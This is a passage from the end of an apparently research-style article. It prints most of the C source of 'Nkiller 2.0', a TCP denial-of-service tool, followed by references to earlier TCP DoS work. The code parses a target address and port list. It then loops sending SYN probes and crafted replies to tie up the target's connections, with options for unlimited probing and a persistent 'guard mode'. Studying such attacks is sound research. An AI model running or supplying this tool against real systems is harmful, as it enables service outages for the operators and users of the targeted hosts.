    Target->payload = xmalloc(Target->plen);
    /* Raw bytes, no trailing '\0': the length is kept in plen */
    memcpy(Target->payload, o.payload, Target->plen);
  } else {
    Target->payload = NULL;
    Target->plen = 0;
  }

  if (o.path[0]) {
    if (o.vhost[0]) {
      Target->wlen = strlen(o.path) + strlen(o.vhost) +
        sizeof("GET  HTTP/1.0\015\012Host: \015\012\015\012") - 1;
      Target->url = xmalloc(Target->wlen + 1);
      /* + 1 for trailing '\0' of snprintf()  */
      snprintf(Target->url, Target->wlen + 1, 
          "GET %s HTTP/1.0\015\012Host: %s\015\012\015\012",
          o.path, o.vhost);
    } else {
      Target->wlen = strlen(o.path) + 
        sizeof("GET  HTTP/1.0\015\012\015\012") - 1;
      Target->url = xmalloc(Target->wlen + 1); 
      snprintf(Target->url, Target->wlen + 1, 
          "GET %s HTTP/1.0\015\012\015\012", o.path);
    }
  } else {
    Target->wlen = sizeof(WEB_PAYLOAD) - 1;
    Target->url = xmalloc(Target->wlen);
    memcpy(Target->url, WEB_PAYLOAD, Target->wlen);
  }
}


/* No way you have seen this before! */
static uint16_t
checksum_comp(uint16_t *addr, int len)
{
  register long sum = 0;
  uint16_t checksum;
  int count = len;
  uint16_t temp;

  while (count > 1)  {
    temp = *addr++;
    sum += temp;
    count -= 2;
  }
  /* Odd trailing byte: read it as unsigned to avoid sign extension */
  if (count > 0)
    sum += *(uint8_t *) addr;

  while (sum >> 16)
    sum = (sum & 0xffff) + (sum >> 16);

  checksum = ~sum;
  return checksum;
}


int
main(int argc, char **argv)
{
  int print_help;
  int opt;
  int required;
  int debug_level;
  size_t i;
  unsigned int portlen;
  unsigned int probes, probes_sent, probes_left;
  unsigned int probes_this_rnd, probes_rnd_fini;
  int unlimited, state, probe_byusr;
  HostInfo *Target;
  SniffInfo *Sniffer;
  u_char *reply;
  char *endp; 

  srandom(time(0));

  if (argc == 1) {
    usage();
  }

  memset(&o, 0, sizeof(o));
  unlimited = 0;
  required = 0;
  portlen = 0;
  print_help = 0;
  probe_byusr = 0;

  probes = DEFAULT_NUM_PROBES;
  o.sleep = DEFAULT_SLEEP_TIME;
  o.probes_per_rnd = DEFAULT_PROBES_RND;
  o.probe_interval = DEFAULT_PROBE_INTERVAL;
  /* o was zeroed above, so size - 1 keeps the key NUL-terminated */
  strncpy(o.skey, DEFAULT_KEY, sizeof(o.skey) - 1);
  o.polltime = DEFAULT_POLLTIME;

  /* Option parsing */
  while ((opt = getopt(argc, argv, "t:k:l:w:c:p:n:vd:s:r:N:T:P:yhg"))
      != -1)
  {
    switch (opt)
    {
      case 't':   /* target address */
        strncpy(o.target, optarg, sizeof(o.target) - 1);
        required++;
        break;
      case 'k':   /* secret key */
        strncpy(o.skey, optarg, sizeof(o.skey) - 1);
        break;
      case 'l':   /* payload */
        strncpy(o.payload, optarg, sizeof(o.payload) - 1);
        break;
      case 'w':  /* path */
        strncpy(o.path, optarg, sizeof(o.path) - 1);
        break;
      case 'r':    /* vhost name */
        strncpy(o.vhost, optarg, sizeof(o.vhost) -1);
        break;
      case 'c':   /* polltime */
        endp = NULL;
        errno = 0;
        o.polltime = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid polltime: %s\n", optarg);
        break;
      case 'p':   /* destination port */
        if (!(o.portlist = port_parse(optarg, &portlen))) 
          fatal("Couldn't parse ports!\n");
        required++;
        break;
      case 'n':   /* number of probes */
        endp = NULL;
        errno = 0;
        o.probes = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid probe number: %s\n", optarg);
        probe_byusr++;
        if (!o.probes) {
          unlimited++;
          probe_byusr = 0;
        }
        break;
      case 'N':    /* probes per round */
        endp = NULL;
        errno = 0;
        o.probes_per_rnd = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid probes-per-round number: %s\n", optarg);
        break;
      case 'T':    /* template number */
        endp = NULL;
        errno = 0;
        o.template = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid template number: %s\n", optarg);
        break;
      case 'P':    /* probe timer interval */
        endp = NULL;
        errno = 0;
        o.probe_interval = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid probe-interval number: %s\n", optarg);
        break;
      case 'g':  /* guard mode */
        o.guardmode++;
        break;
      case 'v':  /* verbose mode */
        o.verbose++;
        break;
      case 'd':  /* debug mode */
        endp = NULL;
        errno = 0;
        debug_level = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid debug level: %s\n", optarg);
        if (debug_level != 1 && debug_level != 2)
          fatal("Debug level must be either 1 or 2\n");
        else if (debug_level == 1)
          o.debug++;
        else {
          o.debug2++;
          o.debug++;
        }
        break;
      case 's':   /* sleep time between each probe */
        endp = NULL;
        errno = 0;
        o.sleep = strtoul(optarg, &endp, 0);
        if (errno != 0 || *endp != '\0')
          fatal("Invalid sleep number: %s\n", optarg);
        break;
      case 'y':   /* dynamic port handling */
        o.dynamic++;
        break;
      case 'h':   /* help - usage */
        print_help = 1;
        break;
      case '?':   /* error */
        usage();
        break;
    }
  }

  if (print_help) {
    help();
    exit(EXIT_SUCCESS);
  }

  /* Raw sockets and pcap need an effective uid of 0 */
  if (geteuid() != 0)
    fatal("You need to be root.\n");

  if (required < 2)
    fatal("You have to define both -t <target> and -p <portlist>\n");

  (void) fprintf(stdout, "\nStarting Nkiller 2.0 "
      "( http://sock-raw.org )\n");

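  Target = xmalloc(sizeof(HostInfo));
  /* port_add() tests ports.first against NULL, so start from a
   * zeroed structure in case xmalloc() does not clear memory */
  memset(Target, 0, sizeof(*Target));
  Sniffer = xmalloc(sizeof(SniffInfo));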

  Target->portlen = portlen;
  for (i = 0; i < Target->portlen; i++)
    port_add(Target, o.portlist[i]);

  if (!unlimited && probe_byusr)
    probes = o.probes;

  if (inet_pton(AF_INET, o.target, &Target->daddr) != 1)
    fatal("Invalid target address: %s\n", o.target);

  handle_payloads(Target);
  sniffer_init(Target, Sniffer);

  if (o.verbose) {
    if (unlimited) 
      (void) fprintf(stdout, "Probes: unlimited\n");
    else 
      (void) fprintf(stdout, "Probes: %u\n", probes);
    (void) fprintf(stdout, 
        "Probes per round: %u\n"
        "Pcap polling time: %u microseconds\n"
        "Sleep time: %u microseconds\n"
        "Key: %s\n"
        "Probe interval: %u seconds\n"
        "Template: %s\n", o.probes_per_rnd, o.polltime,
        o.sleep, o.skey, o.probe_interval, get_template(o.template));
    if (o.guardmode)
      (void) fprintf(stdout, "Guardmode on\n");
  }

  probes_sent = 0;
  probes_left = probes;
  probes_rnd_fini = 0;
  probes_this_rnd = 0;

  /* Main loop */
  while (probes_left || o.guardmode || unlimited) {

    if (probes_rnd_fini >= o.probes_per_rnd) {
      probes_rnd_fini = 0;
      probes_this_rnd = 0;
    }

    if (!unlimited && probes_left == probes / 2 && o.verbose)
      (void) fprintf(stdout, "Half of probes left.\n");

    if (probes_sent < probes && probes_this_rnd < o.probes_per_rnd) {
      send_syn_probe(Target, Sniffer);
      if (!unlimited)
        probes_sent++;
      probes_this_rnd++;
    }

    usleep(o.sleep);  /* Wait a bit before each probe */

    state = check_replies(Target, Sniffer, &reply);

    switch (state) 
    {
      case S_ERR: 
        continue;
        break;
      case S_SYNACK:
        send_probe(reply, Target, S_SYNACK);
        free(reply);
        break;
      case S_FDACK:
        continue;
        break;
      case S_PROBE:
        send_probe(reply, Target, S_PROBE);
        free(reply);
        probes_rnd_fini++;
        if (!unlimited)
          probes_left--;
        break;
      case S_DATA_0:
        send_probe(reply, Target, S_DATA_0);
        free(reply);
        if (o.template == T_BSDWIN)
          probes_rnd_fini++;
        break;
      case S_DATA_1:
        send_probe(reply, Target, S_DATA_1);
        free(reply);
        /* Increase aggressiveness */
        probes_rnd_fini++; 
        break;
      default:
        break;
    }

  }

  (void) fprintf(stdout, "Finished.\n");
  exit(EXIT_SUCCESS);
}


--[ 6 - References

[1]. netkill - generic remote DoS attack by Stanislav Shalunov -
http://seclists.org/bugtraq/2000/Apr/0152.html

[2]. TCP DoS Vulnerabilities by Fabian 'fabs' Yamaguchi -
http://www.recurity-labs.com/content/pub/25C3TCPVulnerabilities.pdf

[3]. TCP/IP Illustrated vol. 1 - W. Richard Stevens

[4]. Linux Kernel Development (Chapter 10 - Timers and Time Management)
  - Robert Love

Additional related material:

[5]. Understanding Linux Network Internals (O'Reilly)

[6]. Understanding the Linux Kernel (O'Reilly)

[7]. Dave Miller's TCP notes:
      - http://vger.kernel.org/~davem/tcp_output.html
      - http://vger.kernel.org/~davem/tcp_skbcb.html

[8]. The Design and Implementation of the FreeBSD Operating System

--------[ EOF